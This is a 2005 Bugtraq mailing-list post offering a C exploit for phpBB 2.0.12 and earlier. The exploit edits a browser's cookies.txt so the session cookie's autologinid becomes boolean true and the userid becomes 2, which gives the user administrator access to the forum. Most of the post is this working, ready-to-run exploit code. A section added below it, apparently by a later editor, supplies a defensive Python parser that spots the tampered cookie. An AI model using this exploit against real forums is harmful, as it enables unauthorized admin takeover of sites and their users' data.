
List:       bugtraq
Subject:    phpBB <= 2.0.12 UID Exploit
From:       federico gonzales <elrengo94 () hotmail ! com>
Date:       2005-03-01 4:56:15
Message-ID: 20050301045615.18939.qmail () www ! securityfocus ! com



I made this exploit to get admin permissions in phpBB2 2.0.12 forums. It requires Mozilla or Firefox installed. The instructions are in the exploit.

Bye

/*
Author: Paisterist
Date: 28-02-05
[N]eo [S]ecurity [T]eam ©

Description: this exploit modifies the user id stored in your cookies.txt file (Firefox and
Mozilla). You have to log in to the forum with the autologin option unchecked, then close
the browser and execute the exploit.
If you have any problem with the exploit, remove all cookies and do it all again.

Note: you have to put the exploit in the same directory as cookies.txt.
This exploit overwrites all phpBB cookies that have the user id specified.

I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS DISCOVERED IT.

By Paisterist

http://neosecurityteam.net
http://neosecurityteam.tk

Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx, Arcanhell, Alluz.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    FILE *pointer;
    char contenido[10000];
    /* URL-encoded serialized cookie prefix up to the user id value:
       a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"
       (unsized arrays so the literals keep their NUL terminator) */
    char cookie[] = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22";
    /* Suffix that follows the user id: ";} */
    char cookief[] = "%22%3B%7D";
    /* Replacement value: autologinid becomes b:1 and userid becomes "2" */
    char cookie_false[] = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D";
    /* prefix + at most 6 id characters + suffix + NUL */
    char cookiec[sizeof(cookie) + 6 + sizeof(cookief)];
    char *pos;
    size_t n;

    if (argc != 2) {
        printf("Usage: phpbb_exploit.exe user_id\n\n");
        return 1;
    }

    pointer = fopen("cookies.txt", "r");
    if (pointer) {
        /* Read with element size 1 so a file that is not a multiple of a block
           size is not truncated, then terminate the buffer for strstr() */
        n = fread(contenido, 1, sizeof(contenido) - 1, pointer);
        contenido[n] = '\0';
        fclose(pointer);
    } else {
        printf("The file can't be opened\n");
        return 1;
    }

    /* Build the cookie value to look for: prefix + user id + suffix */
    strcpy(cookiec, cookie);
    strncat(cookiec, argv[1], 6);
    strcat(cookiec, cookief);

    if ((pos = strstr(contenido, cookiec))) {
        /* Overwrite the matched value in place. The match is always longer than
           cookie_false, so the tail of the old value (%22%3B%7D) stays behind it,
           exactly as in the original loop */
        memcpy(pos, cookie_false, strlen(cookie_false));
    } else {
        printf("The file cookies.txt isn't valid for executing the exploit or the user id is incorrect\n");
        return 1;
    }

    if ((pointer = fopen("cookies.txt", "w"))) {
        fputs(contenido, pointer);
        fclose(pointer);
        printf("Cookie modified: \n\n%s\n\n", contenido);
        printf("The cookies file has been overwritten... looks like the exploit has worked\n");
    } else {
        printf("\n\nThe file cookies.txt has not write permissions.\n");
        return 1;
    }
    return 0;
}
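A defender-side check, added here and not part of the original post or of phpBB: the posted tool turns a cookie whose `autologinid` is an empty string into one whose `autologinid` is the boolean `b:1`, and because its 92-character replacement is shorter than the value it overwrites, the old value's closing `%22%3B%7D` is left dangling behind it. The script below parses the URL-encoded serialized cookie value (the subset of PHP serialization such a cookie carries: strings, booleans, integers and arrays) and reports both signs. The sample values are constructed from the strings in the exploit (user id 7 is made up; the tampered value is exactly what the exploit writes over a one-digit id). The rule that `autologinid` must be a string and `userid` a numeric string is an assumption taken from the untampered format the exploit searches for, not a check quoted from phpBB.

```python
from urllib.parse import unquote


class PhpUnserializeError(ValueError):
    """Raised when the serialized text does not match the subset understood here."""


def parse_php_value(s, i):
    """Parse one PHP-serialized value starting at s[i].

    Supports s (string), b (bool), i (int) and a (array), which is all a
    phpBB2 session cookie carries. Returns (value, index_after_value).
    """
    if i >= len(s):
        raise PhpUnserializeError("unexpected end of data")
    t = s[i]
    if t == "s":
        # s:<len>:"<bytes>";  the declared length, not a quote, ends the string
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2
        value = s[start:start + length]
        if s[start + length:start + length + 2] != '";':
            raise PhpUnserializeError("malformed string at %d" % i)
        return value, start + length + 2
    if t == "b":
        # b:0; or b:1;
        if s[i + 1:i + 2] != ":" or s[i + 3:i + 4] != ";":
            raise PhpUnserializeError("malformed bool at %d" % i)
        return s[i + 2] == "1", i + 4
    if t == "i":
        semi = s.index(";", i + 2)
        return int(s[i + 2:semi]), semi + 1
    if t == "a":
        # a:<count>:{ key value key value ... }
        colon = s.index(":", i + 2)
        count = int(s[i + 2:colon])
        if s[colon + 1:colon + 2] != "{":
            raise PhpUnserializeError("malformed array at %d" % i)
        k = colon + 2
        out = {}
        for _ in range(count):
            key, k = parse_php_value(s, k)
            val, k = parse_php_value(s, k)
            out[key] = val
        if s[k:k + 1] != "}":
            raise PhpUnserializeError("unterminated array at %d" % i)
        return out, k + 1
    raise PhpUnserializeError("unsupported type %r at %d" % (t, i))


def audit_phpbb_cookie(raw_cookie):
    """Return a list of findings for a URL-encoded phpBB2 session cookie value.

    An empty list means the value has the shape of the untampered cookie the
    exploit searches for. Assumption (not a phpBB rule): autologinid must be a
    string and userid a numeric string; a boolean autologinid is a tampering sign.
    """
    decoded = unquote(raw_cookie)
    findings = []
    try:
        data, end = parse_php_value(decoded, 0)
    except (ValueError, IndexError) as exc:  # PhpUnserializeError is a ValueError
        return ["unparseable cookie: %s" % exc]
    if not isinstance(data, dict):
        return ["top-level value is not an array"]
    if not isinstance(data.get("autologinid"), str):
        findings.append("autologinid is not a string (type confusion)")
    userid = data.get("userid")
    if not (isinstance(userid, str) and userid.isdigit()):
        findings.append("userid is not a numeric string")
    if end != len(decoded):
        # the exploit leaves the old value's closing %22%3B%7D after its replacement
        findings.append("trailing data after serialized array")
    return findings


# Constructed sample values: user id 7 is made up. The tampered value is what the
# posted exploit writes over a one-digit id: its 92-character replacement followed
# by the untouched last 9 characters of the old value.
NORMAL_COOKIE = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B"
                 "s%3A6%3A%22userid%22%3Bs%3A1%3A%227%22%3B%7D")
TAMPERED_COOKIE = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B"
                   "s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
                   "%22%3B%7D")

if __name__ == "__main__":
    for label, value in (("normal", NORMAL_COOKIE), ("tampered", TAMPERED_COOKIE)):
        print(label, unquote(value), audit_phpbb_cookie(value) or "OK")
```

The parser is deliberately strict about the four types it knows and about the declared string length, so a value that only looks like the expected array (wrong type for a key, or bytes left over after the closing brace) is reported rather than silently accepted; the same check can be run over a web server's captured Cookie headers to spot the tampered form.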

